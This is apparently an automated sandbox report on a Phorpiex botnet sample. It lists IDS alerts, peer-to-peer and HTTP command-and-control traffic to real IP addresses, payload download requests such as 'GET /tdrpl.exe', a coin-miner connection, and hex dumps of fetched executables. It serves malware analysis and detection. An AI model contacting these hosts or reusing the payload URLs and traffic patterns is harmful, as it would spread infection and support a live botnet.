                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 90.156.162.72:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 89.218.184.42:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 117.236.188.177:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:49705 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54297 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:58707 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 94.230.236.63:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 94.230.235.140:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:49707 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:58709 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 46.100.182.167:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 92.46.228.246:40500
                                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.8:49704
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:49714 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.8:49707
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54300 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 198.163.192.16:40500
                                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.8:49704
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54303 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54306 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 95.58.91.70:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54325 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54341 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 90.156.160.86:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54356 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54376 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 187.133.73.5:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54393 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54414 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54431 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 95.56.76.10:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 5.232.31.242:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54448 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54464 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54494 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 5.133.123.159:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54513 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 92.46.174.254:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54530 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54551 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 5.202.213.167:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54568 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 217.30.162.161:40500
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 151.232.255.73:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54587 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54602 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54599 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54601 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 213.206.45.147:40500
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54597 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54606 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.8:54604 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.8:62892 -> 178.88.95.33:40500
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.8:49705
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.8:54604
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.8:54306
                                Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.8:54494
                                Contains functionality to check if Internet connection is working
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com3_2_0040B430
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040B430
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com17_2_0040B430
                                Source: unknownNetwork traffic detected: IP country count 11
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91061 Sleep,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,wsprintfW,wsprintfW,PathFileExistsW,rand,wsprintfW,strlen,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00A91061
                                Source: global trafficTCP traffic: 192.168.2.8:49709 -> 178.90.122.209:40500
                                Source: global trafficTCP traffic: 192.168.2.8:58708 -> 187.133.73.5:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54295 -> 5.76.120.41:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54301 -> 37.254.242.74:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54304 -> 45.248.160.159:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54322 -> 80.191.218.209:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54355 -> 124.109.48.132:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54387 -> 213.206.39.40:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54399 -> 185.215.113.66:5152
                                Source: global trafficTCP traffic: 192.168.2.8:54415 -> 151.244.52.254:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54442 -> 2.181.31.167:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54472 -> 78.137.95.224:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54500 -> 185.131.95.169:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54529 -> 145.249.227.150:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54554 -> 198.163.193.96:40500
                                Source: global trafficTCP traffic: 192.168.2.8:54579 -> 185.203.237.228:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 90.156.162.72:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 89.218.184.42:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 46.100.182.167:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 94.230.236.63:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 117.236.188.177:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 92.46.228.246:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 94.230.235.140:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 198.163.192.16:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 2.178.73.57:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 95.59.165.102:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 59.91.192.122:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 95.58.91.70:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 90.156.160.86:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 95.56.76.10:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 5.232.31.242:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 198.163.193.230:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 5.133.123.159:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 92.46.174.254:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 5.202.213.167:40500
                                Source: global trafficUDP traffic: 192.168.2.8:62892 -> 217.30.162.161:40500
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:28 GMTContent-Type: application/octet-streamContent-Length: 85504Last-Modified: Sun, 20 Oct 2024 18:13:32 GMTConnection: keep-aliveETag: "6715484c-14e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 30 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 ed 00 00 00 10 00 00 00 ee 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 3f 00 00 00 00 01 00 00 40 00 00 00 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 2e 00 00 00 40 01 00 00 1c 00 00 00 32 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:11 GMTContent-Type: application/octet-streamContent-Length: 5827584Last-Modified: Fri, 27 Sep 2024 20:03:46 GMTConnection: keep-aliveETag: "66f70fa2-58ec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 58 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 22 59 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 93 01 00 00 10 00 00 00 94 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 de 56 00 00 b0 01 00 00 e0 56 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f0 39 00 00 00 90 58 00 00 3a 00 00 00 78 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 58 11 00 00 00 d0 58 00 00 12 00 00 00 b2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f4 0e 00 00 00 f0 58 00 00 10 00 00 00 c4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1c 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 20 59 00 00 0c 00 00 00 d4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 30 59 00 00 02 00 00 00 e0 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 59 00 00 02 00 00 00 e2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 50 59 00 00 04 00 00 00 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 60 59 00 00 04 00 00 00 e8 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
                                Source: Joe Sandbox ViewIP Address: 91.202.233.141 91.202.233.141
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: Joe Sandbox ViewASN Name: WINDSTREAMUS WINDSTREAMUS
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54297 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:58707 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:58709 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54300 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54299 -> 185.215.113.84:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54302 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54303 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54306 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54325 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54341 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54356 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54376 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54393 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54414 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54431 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54448 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54464 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54494 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54513 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54530 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54551 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54568 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54587 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54602 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54599 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54601 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54597 -> 91.202.233.141:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54606 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:54604 -> 185.215.113.66:80
                                Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.8:54399 -> 185.215.113.66:5152
                                Source: global trafficHTTP traffic detected: GET /tdrpl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
